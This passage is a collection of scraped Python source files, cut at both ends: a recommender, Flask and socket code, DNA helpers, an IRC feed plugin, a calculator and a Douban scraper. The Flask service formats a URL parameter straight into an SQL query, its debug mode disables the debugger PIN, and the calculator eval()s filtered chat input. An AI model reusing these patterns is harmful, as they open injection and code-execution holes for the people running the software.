self.cooccur_dict[item_id][rec_clicked] += 1\n else:\n self.cooccur_dict[item_id][rec_clicked] = 1\n if item_id in self.cooccur_dict[rec_clicked].keys():\n self.cooccur_dict[rec_clicked][item_id] += 1\n else:\n self.cooccur_dict[rec_clicked][item_id] = 1\n\n def get_recommendation(self, nextevent):\n item_id = nextevent[self.item_id_idx]\n user_id = nextevent[self.user_id_idx]\n sorted_item_list = []\n try:\n item_dict = self.cooccur_dict[item_id]\n ordered = OrderedDict(sorted(item_dict.items(),key=lambda t: t[1], reverse=True))\n sorted_item_list = list(ordered.keys())\n except:\n pass\n if 0 in sorted_item_list:\n sorted_item_list.remove(0)\n if item_id in sorted_item_list:\n sorted_item_list.remove(item_id)\n try:\n user_items = self.user_item_dict[user_id]\n result = [x for x in sorted_item_list if x not in user_items]\n return result[0:6]\n except:\n return sorted_item_list[0:6]\n\n\n\n def run_ranker(self):\n for line in self.bridge_table:\n command = line.split('\\t')[0]\n if(command == 'rec'):\n nextrec = self.rec_csv.readline().split('\\t')\n self.store_view(nextrec)\n self.add_session(nextrec)\n if(command == 'event'):\n self.total_events += 1\n nextevent = self.event_csv.readline().split('\\t')\n self.add_score(nextevent)\n self.store_event(nextevent)\n\n self.nrrows += 1\n if (self.nrrows % 100000 == 0):\n print(self.i)\n self.logging()","sub_path":"recommenders/cooccur_based_ranker.py","file_name":"cooccur_based_ranker.py","file_ext":"py","file_size_in_byte":4812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"306730856","text":"import struct\n\na = \"hello this is my [redacted]\"\nb = bytearray()\n\nb.extend(map(ord,a))\n\nl = len(a)\n\np = struct.pack('>I',l) + b\n\nprint(l)\nprint(p)\n\nsiz = struct.calcsize('>I')\nprint(siz)\n\nv = struct.unpack('>I',p[:siz])\nprint(v)\nprint(p[siz:])\n\n\nu = \"\\x00\\x00\\x00\\x2C{\\\"Type\\\":6,\\\"Info\\\":\\\"info\\\",\\\"PayLoad\\\":\\\"payload\\\"}\"\n\nub = bytearray()\nub.extend(map(ord,u))\n\ng = struct.unpack('>I',ub[:siz])\n\nprint(g)\n","sub_path":"PythonTests/BInaryTest.py","file_name":"BInaryTest.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"273821540","text":"import flask\nimport random\nimport pandas as pd\nimport logging\nimport os\nimport sqlite3\nfrom flask_json import FlaskJSON, JsonError, as_json\n# logging\nlogger = logging.getLogger(__name__)\nlogging.basicConfig(level='DEBUG')\n\n\n# ----| IO functions\n\ndef get_customer_prediction(customer_id=None):\n \"\"\"Get predictions for a customer\n\n customer_id: returns random customer if None\n \"\"\"\n logger.info('reading predictions from db')\n file=flask.current_app.config.predictions_file\n conn=sqlite3.connect(file)\n if customer_id:\n query='select CLV from predictions where customer_id = \"{}\"'\n results=conn.execute(query.format(customer_id)).fetchall()\n if results:\n prediction=results[0][0]\n else:\n raise JsonError(description='no data for this customer_id',\n status_=404)\n else:\n query='select * from predictions order by random() limit 1'\n customer_id, prediction=conn.execute(query).fetchall()[0]\n return customer_id, prediction\n\n\n# CLV service\nCLV_server = flask.Blueprint('CLV_server', 'CLV_server')\n\n\n@CLV_server.route('/customers//predicted_CLV')\n@as_json\ndef CLV_prediction(customer_id):\n \"\"\"Return CLV prediction for the given customer_id\n\n if customer_id is 'random', the customer id is chosen at random from the available data.\n\n ex:\n >>GET /customers/2504175708a53b19fe067b06472e4cec/predicted_CLV\n {\n \"customer_id\": \"2504175708a53b19fe067b06472e4cec\", \n \"predicted_CLV\": 116.92\n }\n \"\"\"\n if customer_id == 'random':\n customer_id = None\n customer_id, predicted_CLV = get_customer_prediction(customer_id)\n payload = {\n 'customer_id': customer_id,\n 'predicted_CLV': predicted_CLV\n }\n return payload\n\n@CLV_server.route('/test')\ndef test():\n return 'OK'\n\n# ----| app startup\n\n\ndef create_app(config='prod'):\n app = flask.Flask('CLV_predict')\n app.register_blueprint(CLV_server)\n FlaskJSON(app)\n\n if config == 'debug':\n app.config.predictions_file = 'data/predictions_test.db'\n app.debug = True\n os.environ['WERKZEUG_DEBUG_PIN'] = 'off'\n elif config == 'test':\n app.config.predictions_file = 'data/predictions_test.db'\n elif config == 'prod':\n app.config.predictions_file = 'data/predictions.db'\n return app\n\n\nif __name__ == '__main__':\n app = create_app()\n app.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"292921971","text":"# -*- coding: utf-8 -*-\n# __author__ = 'qinjincheng'\n\nimport socket\nimport random\nimport time\n\ndef main():\n host = '127.0.0.1'\n port = 8080\n for i in range(random.randrange(10, 20)):\n time.sleep(1)\n s = socket.socket()\n s.connect((host, port))\n print('client send ({}) to server'.format(i))\n s.send(str(i).encode())\n data = s.recv(1024)\n print('client recv raw data ({}) from server'.format(data))\n print('client recv dec data ({}) from server'.format(data.decode()))\n s.close()\n\ndef main(sk):\n {'tcp': tcp_client, 'udp': udp_client}[sk]()\n\ndef tcp_client():\n host = socket.gethostname()\n port = 12345\n print('Connect -> {}:{}'.format(host, port))\n s = socket.socket()\n s.connect((host, port))\n print('Connection already established')\n info = str()\n while info != 'byebye':\n data = input('Content send: ')\n s.send(data.encode())\n if data == 'byebye':\n break\n info = s.recv(1024).decode()\n print('Content received:\\n{}'.format(info))\n s.close()\n\ndef udp_client():\n host = socket.gethostname()\n port = 54321\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n data = input('Please input a Centigrade degree: ')\n s.sendto(data.encode(), (host, port))\n print(s.recv(1024).decode())\n s.close()\n\nif __name__ == '__main__':\n main(sk='udp')\n","sub_path":"sckt/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"561456820","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport urllib\nimport mechanize\n\nurl = \"http://127.0.0.1:8000/cgi-bin/index.py\"\n\nbr = mechanize.Browser()\npage = br.open(url)\n\nbr.select_form(nr=0)\nbr[\"name\"]=\"MOTOUCHI\"\nbr[\"comments\"]=\"hello world\"\nbr.submit()\n","sub_path":"network/seccamp/client3.py","file_name":"client3.py","file_ext":"py","file_size_in_byte":257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"501064558","text":"\"\"\"BioDNA : a module of DNA processing functions \"\"\"\nimport re\n# ----------------------------------------\n\ndef complementDNA_to_DNA( DNA ):\n \"\"\"Returns the complement strand of DNA\"\"\"\n\n # you need to do the work here\n changeOriginal = \"ACTG\"\n toComplement = \"TGAC\"\n transTable = str.maketrans(changeOriginal, toComplement)\n complementaryStrand = DNA.translate(transTable)\n \n return complementaryStrand\n# ----------------------------------------\n\n# ----------------------------------------\ndef complementDNA_to_RNA( DNA ):\n \"\"\"Returns the complement strand of RNA\"\"\"\n\n # you need to do the work here\n changeOriginal = \"T\"\n toComplement = \"U\"\n transTable = str.maketrans(changeOriginal, toComplement)\n complementaryStrand = DNA.translate(transTable) \n\n return complementaryStrand\n# ----------------------------------------\n\n# ---------------------------------------- \ndef transcribe( DNA ):\n \"\"\"Simulates transcription by building template strand and then complementing that to RNA\"\"\"\n \n # gene is on the DNA strand\n # but RNA copy is built off the template (or anti-sense) strand\n\n mRNA = \"\" \n\n # (a) get complement of the DNA strand (that is, make the template strand)\n compDNA = complementDNA_to_DNA(DNA)\n \n # (b) get mRNA complement of the template strand\n # (c) return the mRNA\n \n # you need to do the work here \n \n complementDNA = complementDNA_to_DNA(DNA)\n \n print (\" DNA: 5'\", DNA, \"3'\")\n print (\" DNA: 3'\", complementDNA, \"5'\")\n \n Bars = \"\"\n DNALen = len(DNA)\n while (DNALen > 0):\n Bars = Bars + \"|\"\n DNALen = DNALen - 1\n \n print (\" \", Bars) \n \n mRNA = complementDNA_to_RNA(DNA)\n \n\n \n \n return mRNA\n# ----------------------------------------\ndef getDNA(filename):\n \"\"\" Takes a .fna file of a DNA sequence and reads in the lines\"\"\"\n \n INFILE = open(filename, 'r')\n \n for filelines in INFILE:\n sequence = filelines\n \n return sequence\n\n\n#-----------------------------------------\ndef findDirectRepeats(upstream):\n \"\"\"Uses regex to search through the file and find direct repeats\"\"\"\n DRregex = re.compile(r\"(.)(.)(.?)\\1\\2\\3\")\n \n DRiterator = DRregex.finditer(upstream)\n DRtotal = 0\n for nextDR in DRiterator: \n DR = nextDR.group() \n DRstart = nextDR.start() \n DRend = nextDR.end() \n DRtotal = DRtotal + len(DR)\n \n print (\"Found DR:\", DR, \"[\", DRstart+1, \"to\", DRend, \"bp]\") \n return DRtotal\n \ndef findMirrorRepeats(upstream):\n \"\"\"Uses regex to search through the file and find mirror repeats\"\"\"\n \n MRregex = re.compile( r\"(.)(.)(.)\\3\\2\\1\" ) # build regex for MR of len=4bp\n \n MRiterator = MRregex.finditer(upstream) # find all matches\n MRtotal = 0 #going to be used to find percentile\n for nextMR in MRiterator: # loop thru list of matches\n MR = nextMR.group() # get the actual regex match \n MRstart = nextMR.start() # where did it begin\n MRend = nextMR.end() # location just after the end\n MRtotal = MRtotal + len(MR)\n \n print (\"Found MR:\", MR, \"[\", MRstart+1, \"to\", MRend, \"bp]\") \n return MRtotal\n#-----------------------------------------\ndef findATRepeats(upstream):\n \"\"\"Uses regex to search through the file and find ATAT repeats\"\"\"\n \n ATregex = re.compile(r\"(A)(T)(A)(T)\\1\\2\\3\\4\")\n \n ATiterator = ATregex.finditer(upstream)\n ATtotal = 0\n for nextAT in ATiterator: \n AT = nextAT.group() \n ATstart = nextAT.start() \n ATend = nextAT.end() \n ATtotal = ATtotal + len(AT)\n \n print (\"Found AT:\", AT, \"[\", ATstart+1, \"to\", ATend, \"bp]\") \n return ATtotal\n#-----------------------------------------\ndef makeAminoAcidTable( ):\n \"\"\"Returns a Python Dictionary (hash table) that maps RNA nucleotides to Amino Acid symbols;\n both one letter and three letter symbols are returned; the user will need to parse which of\n these symbols they want to use\"\"\"\n \n AAtable = { \"UUU\":\"F|Phe\",\"UUC\":\"F|Phe\",\"UUA\":\"L|Leu\",\"UUG\":\"L|Leu\",\"UCU\":\"S|Ser\",\"UCC\":\"S|Ser\",\n \"UCA\":\"S|Ser\",\"UCG\":\"S|Ser\",\"UAU\":\"Y|Tyr\",\"UAC\":\"Y|Tyr\",\"UAA\":\"*|***\",\"UAG\":\"*|***\",\n \"UGU\":\"C|Cys\",\"UGC\":\"C|Cys\",\"UGA\":\"*|***\",\"UGG\":\"W|Trp\",\"CUU\":\"L|Leu\",\"CUC\":\"L|Leu\",\n \"CUA\":\"L|Leu\",\"CUG\":\"L|Leu\",\"CCU\":\"P|Pro\",\"CCC\":\"P|Pro\",\"CCA\":\"P|Pro\",\"CCG\":\"P|Pro\",\n \"CAU\":\"H|His\",\"CAC\":\"H|His\",\"CAA\":\"Q|Gln\",\"CAG\":\"Q|Gln\",\"CGU\":\"R|Arg\",\"CGC\":\"R|Arg\",\n \"CGA\":\"R|Arg\",\"CGG\":\"R|Arg\",\"AUU\":\"I|Ile\",\"AUC\":\"I|Ile\",\"AUA\":\"I|Ile\",\"AUG\":\"M|Met\",\n \"ACU\":\"T|Thr\",\"ACC\":\"T|Thr\",\"ACA\":\"T|Thr\",\"ACG\":\"T|Thr\",\"AAU\":\"N|Asn\",\"AAC\":\"N|Asn\",\n \"AAA\":\"K|Lys\",\"AAG\":\"K|Lys\",\"AGU\":\"S|Ser\",\"AGC\":\"S|Ser\",\"AGA\":\"R|Arg\",\"AGG\":\"R|Arg\",\n \"GUU\":\"V|Val\",\"GUC\":\"V|Val\",\"GUA\":\"V|Val\",\"GUG\":\"V|Val\",\"GCU\":\"A|Ala\",\"GCC\":\"A|Ala\",\n \"GCA\":\"A|Ala\",\"GCG\":\"A|Ala\",\"GAU\":\"D|Asp\",\"GAC\":\"D|Asp\",\"GAA\":\"E|Glu\",\n \"GAG\":\"E|Glu\",\"GGU\":\"G|Gly\",\"GGC\":\"G|Gly\",\"GGA\":\"G|Gly\",\"GGG\":\"G|Gly\"}\n \n return AAtable\n# ------------------------\n \n\ndef translate( mRNA, AAtable ): \n \"\"\"Returns the 3-letter amino acid string of symbols for the corresponding mRNA\"\"\"\n \n protein = \"\"\n \n startBP = 0\n endBP = len(mRNA)\n \n nextCodonStart = startBP\n # while we don't run off the end of the sequence of mRNA, snag nucleotide codons\n # and build a sequence of amino acid symbols (uses the 3-letter symbols)\n while ( nextCodonStart+3 <= endBP):\n \n # slice out the new RNA nucleotide triple\n nextCodon = mRNA[nextCodonStart:nextCodonStart+3]\n \n # play RIBOSOME: convert an RNA nucleotide-triple to an amino acid symbol\n nextAA = AAtable[ nextCodon ]\n \n # amino acid symbols come as two types of symbols (3 letter and 1 letter);\n # in general: triple:|\n # e.g., \"GAG\":\"E|Glu\" ... thus we need to parse out which type of symbol we want\n \n # we want the 3-letter 'Glu' version here, so slice out from location 2 to the end\n AAsymbol = nextAA[2:]\n \n # add this AA onto the end of the growing amino-acid (protein) chain\n protein = protein + AAsymbol\n \n # move down to next triple\n nextCodonStart = nextCodonStart + 3\n \n # end while more triples to check\n \n return protein\n\n# ---- end translate() ----------------------------------------","sub_path":"Upstream_Sequences/BioDNA.py","file_name":"BioDNA.py","file_ext":"py","file_size_in_byte":6651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"33586782","text":"import feedparser\nimport sys\n\nfrom twisted.python import log\n\nimport plugin\nfrom utils import str_utils, command_saver\n\nSAVE_FILE = \"feedretriver_settings.save\"\nFAIL_MESSAGE = (\"Unable to download or parse feed. Remove unused feeds using \"\n \"the !listfeed and !removefeed commands.\")\n\nHELP_MESSAGE = (\"!addfeed url [fetch time [custom title]] where:\\n\"\n \"url - is the url of the atom or rss feed\\n\"\n \"fetch time - is the number of minutes between each request\\n\"\n \"custom title - is the title used for this feed.\\n\"\n \"If no title is given, the default title parsed from the \"\n \"feed will be used instead.\")\n\nREMOVING_FEED_MESSAGE = u\"Removing: #{} - {}\"\nLIST_FEED_ITEM_MESSAGE = u\"#{}: {}\"\nNO_FEED_MESSAGE = u\"No feeds\"\n\nDEFAULT_FETCH_TIME = 10*60\n\ndef FeedItemToString(title, link, feed_title = \"\"):\n return str_utils.sanitize_string(u\"{}: {} <{}>\".format(feed_title, title, link))\n\n# The Feed class handles printing out new entries\nclass Feed():\n # Note that data could both be a url, or an already parsed feed\n def __init__(self, data, title):\n if isinstance(data, basestring):\n data = feedparser.parse(data)\n self.last_entry = 0\n self._set_last(data.entries)\n self.title = title\n self._update_title(data)\n\n def update(self, data, say):\n if isinstance(data, basestring):\n data = feedparser.parse(data)\n if data.bozo != 0:\n log.msg(\"Error updating feed \" + self.title)\n return\n self._update_title(data)\n log.msg(\"Updating feed: \" + self.title)\n for entry in data.entries:\n # TODO: Check id, title and link, etc\n # Maybe save the entire data.entries and remove all duplicate when\n # a new update happens?\n if entry.published_parsed <= self.last_entry:\n break\n say(FeedItemToString(entry.title, entry.link, self.title))\n self._set_last(data.entries)\n\n def _update_title(self, parsed):\n if parsed.bozo == 0 and self.title == \"\":\n self.title = parsed.feed.title\n self.title = str_utils.sanitize_string(self.title)\n\n def _set_last(self, entries):\n if len(entries) > 0:\n self.last_entry = entries[0].published_parsed\n\n\n# Simple polling class, fetches the feed in a regular intervall and passes\n# the information on to the Feed object\nclass Feedpoller():\n def __init__(self, say, url, update_freq=DEFAULT_FETCH_TIME, title=\"\"):\n parsed = feedparser.parse(url)\n self.feed = Feed(parsed, title)\n if parsed.bozo == 0:\n self.modified = parsed.get(\"modified\", None)\n self.etag = parsed.get(\"etag\", None)\n say(\"Added feed: \" + self.feed.title)\n else:\n self.modified = \"\"\n say(FAIL_MESSAGE)\n self.say = say\n self.url = url\n self.consecutive_fails = 0\n self.update_freq = update_freq\n self.update_count = 0\n\n def update(self):\n self.update_count += 1\n if self.update_count >= self.update_freq:\n self.update_count = 0\n parsed = feedparser.parse(self.url, modified=self.modified, etag=self.etag)\n if parsed.bozo == 1:\n self.consecutive_fails += 1\n if self.consecutive_fails % 10 == 0:\n self.say(FAIL_MESSAGE)\n else:\n self.modified = parsed.get(\"modified\", None)\n self.etag = parsed.get(\"etag\", None)\n self.feed.update(parsed, self.say)\n self.consecutive_fails = 0\n\n# Aggregator class for adding and handling feeds\nclass Feedretriever(plugin.Plugin):\n def __init__(self):\n plugin.Plugin.__init__(self, \"Feedretriever\")\n self.feeds = []\n self.saver = command_saver.CommandSaver(SAVE_FILE)\n\n def started(self, settings):\n log.msg(\"Feedretriever.started\", settings)\n self.saver.read(lambda server, channel, message: self.privmsg(str(server), None, str(channel), message))\n\n def privmsg(self, server, user, channel, message):\n say = lambda msg: self.say(server, channel, msg)\n if message.startswith(\"!feed\") or message.startswith(\"!addfeed\"):\n _, url, time, title = str_utils.split(message, \" \", 4)\n try:\n time = int(time) * 60\n except:\n time = DEFAULT_FETCH_TIME\n if url == \"\":\n say(HELP_MESSAGE)\n return\n self.feeds.append(Feedpoller(say, url, time, title))\n self.saver.save(server, channel, message)\n elif message.startswith(\"!removefeed\"):\n feeds = []\n for i in message.split(\" \"):\n i = int(i) if unicode(i).isdecimal() else -1\n if i >= 0 and i < len(self.feeds):\n feeds.append(i);\n for i in sorted(feeds, reverse=True):\n say(REMOVING_FEED_MESSAGE.format(i, self.feeds[i].feed.title))\n del self.feeds[i]\n self.saver.remove(i)\n log.msg(\"Removed feed: \" + str(i))\n elif message.startswith(\"!listfeed\"):\n if len(self.feeds) == 0:\n say(NO_FEED_MESSAGE)\n for i, feed in enumerate(self.feeds):\n say(LIST_FEED_ITEM_MESSAGE.format(i, feed.feed.title))\n\n def update(self):\n for feed in self.feeds:\n feed.update()\n\nif __name__ == \"__main__\":\n sys.exit(Feedretriever.run())\n","sub_path":"plugins/feedretriever/feedretriever.py","file_name":"feedretriever.py","file_ext":"py","file_size_in_byte":5600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"15825505","text":"from core.decorators import instance, command\nfrom core.command_param_types import Any\nimport re\n\n\n@instance()\nclass CalculatorController:\n def __init__(self):\n self.allow_chars_regex = re.compile(\"^[0123456789.,+\\-*%()/ &|^~<>]+$\")\n\n @command(command=\"calc\", params=[Any(\"formula\")], access_level=\"all\",\n description=\"Perform a calculation\")\n def calc_cmd(self, channel, sender, reply, args):\n forumla = args[0]\n if self.allow_chars_regex.match(forumla):\n try:\n reply(\"%s = %s\" % (forumla, round(eval(forumla), 4)))\n except SyntaxError:\n reply(\"Invalid formula supplied.\")\n else:\n reply(\"Invalid character detected.\")\n","sub_path":"modules/standard/helpbot/calculator_controller.py","file_name":"calculator_controller.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"185198006","text":"import tkinter as tk\nfrom tkinter import *\n\nlaunch_angle = None\nlaunch_speed = None\n\nheightm = 1\nlaunch_height = 500 - heightm * 50\n\ndistance = None\nmax_height = None\nflight_time = None\n\n\ndef runsim():\n print('its working')\n\n\nclass canvas:\n def __init__(self, master=None):\n self.master = master\n\n self.x = 0\n self.y = 0\n\n self.canvas = Canvas(self.master, bg=\"blue\", width=960, height=500)\n self.canvas.pack()\n\n self.ball = self.canvas.create_oval(10, launch_height - 70, 80, launch_height, outline='black', fill='yellow',\n width=2)\n\n self.movement()\n\n run_sim = tk.Button(self.master, text=\"Run Simulation\", padx=5, pady=10, fg=\"white\", bg=\"green\", command=runsim)\n run_sim.pack()\n\n def movement(self):\n self.canvas.move(self.ball, self.x, self.y)\n\n self.canvas.after(100, self.movement)\n\n def launch(self, angle, speed, height):\n height = launch_height\n angle = launch_angle\n speed = launch_speed\n\n\n# enable tkinter modules that create a new window with its name and dimensions and initiates the main loop\nif __name__ == '__main__':\n window = Tk()\n canvas = canvas(window)\n\n window.title(\"Launch Simulator\")\n window.geometry('960x540')\n window.mainloop()\n","sub_path":"Sim.py","file_name":"Sim.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"413903324","text":"import os, sys, re, time\nimport json\nimport requests\nimport hashlib\nimport pandas\nimport random\nfrom bs4 import BeautifulSoup\nfrom urllib import parse\nfrom PIL import Image\nfrom threading import Thread\nimport inspect\nimport ctypes\nimport win32gui\nimport win32con\nimport datetime, time\nfrom selenium import webdriver\nfrom PostgreSQL import PostgreSQL\nfrom function import *\nfrom setting import *\n\nsearch = '/v2/movie/search?q='\n\nUSER_AGENTS = [\n 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0',\n 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36',\n 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:60.0) Gecko/20100101 Firefox/60.0',\n 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331',\n 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)',\n 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',\n 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)',\n 'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',\n 'Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)',\n 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)',\n 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)',\n 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)',\n 'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)',\n 'Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6',\n 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1',\n 'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0',\n 'Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5',\n 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6',\n 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20',\n 'Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52',\n]\n\nclass DouBan(object):\n \"\"\"docstring for DouBan\"\"\"\n name = 'DouBan'\n domain = 'https://api.douban.com'\n\n def __init__(self):\n super(DouBan, self).__init__()\n headers = {\n 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'Accept-Encoding':'gzip, deflate, br',\n 'Accept-Language':'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',\n 'Connection':'keep-alive',\n 'Upgrade-Insecure-Requests':'1',\n }\n self.s = requests.session()\n self.s.headers.update(headers)\n self.path = path\n self.pg = PostgreSQL(db)\n # self.action()\n\n def __getResponse(self, url, data={}, method=''):\n self.s.headers['User-Agent'] = random.choice(USER_AGENTS)\n if method == 'post':\n if len(data) == 0: return\n try: resp = self.s.post(url, data=data)\n except Exception as e: pass\n else: return resp\n else:\n try: resp = self.s.get(url, data=data) if len(data) > 0 else self.s.get(url)\n except Exception as e: pass\n else: return resp\n\n def webSearch(self, mid, title, year, imdb):\n url = 'https://movie.douban.com/subject_search?search_text=%s&cat=1002' % parse.quote(title)\n browser = webdriver.Firefox()\n browser.get(url)\n html = BeautifulSoup(browser.page_source, 'html.parser')\n divs = html.find_all('div',{'class':'item-root'})\n divs = [i.find('a',{'class':'cover-link'}) for i in divs if i.find('a',{'class':'cover-link'}) is not None]\n divs = [{'href':i.get('href'),'title':i.find('img').get('alt'),'src':i.find('img').get('src')} for i in divs]\n reg = r\"([0-9]{4})\"\n num = 1\n string = ''\n for i in divs:\n string += ' %d-%s' % (num,i['title'])\n num += 1\n res = re.findall(reg, i['title'])\n if len(res) > 0 and res[0] == str(year):\n browser.quit()\n return i['href'].split('/')[-2]\n else:\n url = None\n if ':' in title:\n for key in title.split(':'):\n url = self.webSearch(mid, key, year, imdb)\n if url is not None: break\n if url is None:\n panel = win32gui.FindWindow(None, '管理员: 命令提示符 - DouBan')\n if string != '':\n img = self.pg.select('res_img',['filename'],[\"mid = '%s'\" % mid])\n thread = Thread(target=self.openPic, name=\"Open.__process\", args=(img[0][0],))\n thread.setDaemon(True)\n thread.start()\n time.sleep(1)\n win32gui.SetForegroundWindow(panel)\n while True:\n print()\n print('名称:',title)\n print('年代:',year)\n print('imdb:',imdb)\n print(string)\n print()\n number = input(\"请输入确定的序号: \") if string != '' else '0'\n if number.isdigit() and int(number) <= len(divs): break\n if string != '':\n imgHwnd = win32gui.FindWindow('RCImageViewerFrame', None)\n win32gui.PostMessage(imgHwnd, win32con.WM_CLOSE, 0, 0)\n browser.quit()\n if int(number) > 0: return divs[int(number)-1]['href'].split('/')[-2]\n else:\n browser.quit()\n return url\n\n def openPic(self,file):\n img = Image.open(path+'Picture/'+file)\n img.show()\n\n def apiSearch(self, keyword, year=None):\n res = self.__getResponse('%s%s%s' % (self.domain, search, keyword))\n try: res = json.loads(res)\n except Exception as e: pass\n else:\n if res.get('subjects') is None: return\n for i in res.get('subjects'):\n if year is not None and i.get('year') == str(year): return i['id']\n else:\n if ':' in keyword:\n for key in keyword.split(':'):\n con = self.apiSearch(key.strip(), year)\n if con is not None: return con\n\n def getContent(self, id, imdb=None, type='record'):\n url = 'https://movie.douban.com/subject/%s/' % id\n html = self.__getResponse(url)\n if html is None: return\n html = BeautifulSoup(html.text, 'html.parser')\n\n ims = html.findAll('a',{'rel':'nofollow','target':'_blank'})\n im = None\n for i in ims:\n if 'imdb' in i.get('href'): im = i.get('href')\n if im is not None and im != imdb and type == 'record': return\n\n data = {'url':url}\n\n imdb_html = self.__getResponse(im)\n if imdb_html is None: return\n imdb_html = BeautifulSoup(imdb_html.text,'html.parser')\n imdb_html = imdb_html.find('span',{'itemprop':'ratingValue'})\n if imdb_html is not None: data['imdb_score'] = imdb_html.getText()\n\n info = html.find('span', {'property': 'v:itemreviewed'})\n data['title'] = info.text if info is not None else ''\n\n info = html.find('a', {'rel': 'v:directedBy'})\n data['directors'] = modifyName(info.text if info is not None else '')\n\n info = html.find_all('a', {'rel': 'v:starring'})\n if info is not None: data['actors'] = modifyName(','.join([i.text for i in info]))\n\n info = html.find_all('span', {'property': 'v:genre'})\n if info is not None: data['types'] = ','.join([i.text for i in info])\n\n info = html.find_all('span', {'property': 'v:initialReleaseDate'})\n if info is not None: data['playdate'] = ','.join([i.text for i in info])\n\n info = html.find('span', {'property': 'v:runtime'})\n data['duration'] = info.text if info is not None else ''\n\n data['description'] = ''\n data['thestory'] = ''\n info = html.find('span',{'class':'all hidden'})\n if info is None: info = html.find('span', {'property': 'v:summary'})\n if info is not None:\n info = info.text.split('\\n')\n info = [i.lstrip().rstrip() for i in info]\n while '' in info: info.remove('')\n data['description'] = ''.join(info)[:200]\n for i in info: data['thestory'] += '

%s

' % i\n\n info = html.find('div', id='info')\n if info is not None:\n info = info.contents\n for i in range(0, len(info)):\n\n if len(str(info[i])) < 10: continue\n if str(info[i]).find('语言:') != -1: data['language'] = ','.join(modifyLanguage(info[i+1].replace(' / ', ',')))\n if str(info[i]).find('制片国家') != -1: data['district'] = ','.join(modifyDistrict(info[i+1].replace(' / ', ',')))\n if str(info[i]).find('又名:') != -1: data['alias'] = info[i + 1].replace(' / ', ',')\n if str(info[i]).find('编剧:') != -1:\n bj = info[i].findAll('a')\n b = [j.getText() for j in bj]\n data['scriptwriters'] = modifyName(','.join(b))\n\n info = html.find('div', {'class': 'tags-body'})\n if info is not None: data['label'] = ','.join([i.getText() for i in info.findAll('a')])\n info = html.find('strong', {'class': 'll rating_num'})\n if info is not None: data['douban_score'] = info.getText()\n # print(data)\n return data\n \n def 